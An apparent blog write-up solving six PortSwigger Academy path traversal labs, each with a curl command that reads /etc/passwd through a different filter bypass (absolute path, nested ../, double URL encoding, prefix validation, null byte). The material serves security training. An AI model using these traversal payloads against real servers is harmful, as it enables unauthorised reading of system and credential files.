Path Traversal - [PortSwigger]

Cover Image for Path Traversal - [PortSwigger]
Marmeus
Marmeus

Table of Contents

    Introduction

    In this post there is a compilation of every apprentice and practitioner lab related to the path traversal topic from PortSwigger Academy.

    File path traversal, simple case [Apprentice]

    Intercepting the load of the web page, there are a ton of requests to endpoints like /image?filename=48.jpg .

    Note: If you do not see them on HTTP History, go to the HTTP filter settings, "Filter by MIME Type", and check on "Images".

    Trying some path traversal techniques, we obtain the file.

    kali@kali:~$ curl https://<LAB_DOMAIN>.web-security-academy.net/image?filename=../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
[...]

    File path traversal, traversal sequences blocked with absolute path bypass [Practitioner]

    Same as the previous exercise, but this time we need to provide the absolute path.

    kali@kali:~$ curl https://<LAB_DOMAIN>.web-security-academy.net/image?filename=/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
[...]

    File path traversal, traversal sequences stripped non-recursively [Practitioner]

    Because the server is erasing ../, but not doing it recursively, we can create a string that, after the replacement will look like ../.

    kali@kali:~$ curl https://<LAB_DOMAIN>.web-security-academy.net/image?filename=....//....//....//etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin

    File path traversal, traversal sequences stripped with superfluous URL-decode [Practitioner]

    Because the lab only decodes one time to check the input introduced by the user, if you perform a double URL encode of the character "/", you can bypass the filter.

    kali@kali:~$ curl https://<LAB_DOMAIN>.web-security-academy.net/image?filename=..%25%32%66..%25%32%66..%25%32%66etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
[...]

    File path traversal, validation of start of path [Practitioner]

    Because the server checks that the filename parameter contains /var/www/images/, you need to perform the path traversal after that.

    kali@kali:~$ curl https://<LAB_DOMAIN>.web-security-academy.net/image?filename=/var/www/images/../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
[...]

    File path traversal, validation of file extension with null byte bypass [Practitioner]

    Because the lab checks that the string ends with .jpg, you need to use a null byte ("%00") to effectively terminate the file path before the required extension.

    kali@kali:~$ curl https://<LAB_DOMAIN>.web-security-academy.net/image?filename=../../../../etc/passwd%0047.jpg
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
[...]